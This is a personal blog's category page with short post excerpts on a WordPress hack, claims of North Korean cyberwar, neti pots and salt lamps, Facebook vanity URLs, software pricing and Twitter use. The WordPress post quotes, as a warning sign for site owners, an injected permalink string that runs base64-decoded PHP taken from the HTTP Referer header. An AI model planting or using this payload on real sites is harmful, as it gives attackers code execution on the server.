Geek Miscellany

Black holes, LHC, Star Wars, quantum uncertainty… if it is of general geek interest, but doesn’t fit into one of the other categories, it lands here.

WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.

I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.

Hopefully WordPress will issue a fix for this soon- in the mean time, keep an eye on your URLs, WordPress bloggers!

UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e.: not an administrative user) to run some administrator features e.g.: changing the permalinks.

UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.

I’ve included some extracts from my server logs and further thoughts below…

  

(more…)

Continue ReadingWordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Cyberwar? No, malicious script kiddy

According to the lead Republican on the House Intelligence Committee, Peter Hoekstra, the U.S. should launch an all out retaliation against North Korea for their role in the recent cyber attacks on American and South Korean internet targets. Unfortunately for the American people, Mr. Hoekstra is either an idiot, willfully ignorant, or intentionally twisting reality for his own political ends. The best experts in the industry agree that the attacks were launched by an attention-seeking amateur.

(more…)

Continue ReadingCyberwar? No, malicious script kiddy

New age health: Neti pot and Salt crystal lamps

I’m not really a gullible person. I tend to prefer claims backed up by multiple reputable research sources. That said, I am willing to try things that are a bit “out there” if the potential negatives are balanced out sufficiently. I mean, even if something doesn’t really work, if it does little or no harm it may help purely via the placebo effect.

This brings me to a couple of things I’ve invested in recently. The first actually has a fair amount of supporting medical research to support it. The second is pretty much debunked. Yet I’ve adopted both into my life, well aware of the limitations of each. I’m referring to the use of neti pots (or nasal lavage) to improve sinus health, and the second is the use of Himalayan salt lamps.

(more…)

Continue ReadingNew age health: Neti pot and Salt crystal lamps

Facebook landrush: 3 million names registered in first day

I’m not really a Facebook user. I set up an account sometime in 2007, and then promptly forgot my login ID and password. Nothing about Facebook really appealed to me: I’m not sure why, perhaps at least partly because a lot of what it does I had already more or less been doing for a decade with my own website/blog.

However, I heard a few weeks ago that the Facebook folks were going to start allowing people to set up personal or “vanity” urls. So instead of “http://www.facebook.com/profile.php?id=39395883”, you could have something like “http://www.facebook.com/cooldude”. I thought I should probably lay claim to some kind of recognizable URL, and so I dug through my old notes and tried to dredge up my old Facebook account information.

(more…)

Continue ReadingFacebook landrush: 3 million names registered in first day

Why are so many computer users skinflints?

A couple of days ago I responded to a review of a Twitter application I use with the following observations:

200905311133.jpg

The review I was referring to was one in PC Magazine about a BlackBerry Twitter application I use and love called Tweet Genius. Twitter’s 140 character constraints make it a bit tough for me to be completely clear, but my point is this: why is the $10 cost of a highly useful application considered sufficiently noteworthy to be mentioned several times during an otherwise positive review? And why is it that this “it is great, but a major drawback is that it costs something…” kind of notice is so common in software reviews these days?

(more…)

Continue ReadingWhy are so many computer users skinflints?

Shifting my Twits around

I’ve moved my Twitter feed from the right side to the left side navigation area on this page. The “balance” was starting to bug me (i.e.: too much vertical “stuff” on the right versus the left), and for some reason it just seems to make more sense under “recent comments” then above my photo gallery block.

I have not yet really slowed down my rate of “tweeting” yet: by the way, I prefer calling individual Twitter posts “twits”, but apparently that is bad form- sorry. I started on May 14th, and I’m posting somewhere around six to eight updates per day. if you look at my follow cost I seem to have stabilized at just below 400 milliscobles. I’m not feeling any compulsion to tweet: I just do so when something catches my eye and I think other folks might want to hear about it. Probably my main “vanity” when tweeting is that I respond to a few people like badastronomer (Phil Plait) and wilh (Wil Wheaton) on occasion. In part I do this because I’m hoping they might say something back- but generally I actually *do* have a question, I just probably would never have the courage to ask them to their face.   

(more…)

Continue ReadingShifting my Twits around

End of content

No more pages to load

Newer Posts
Older Posts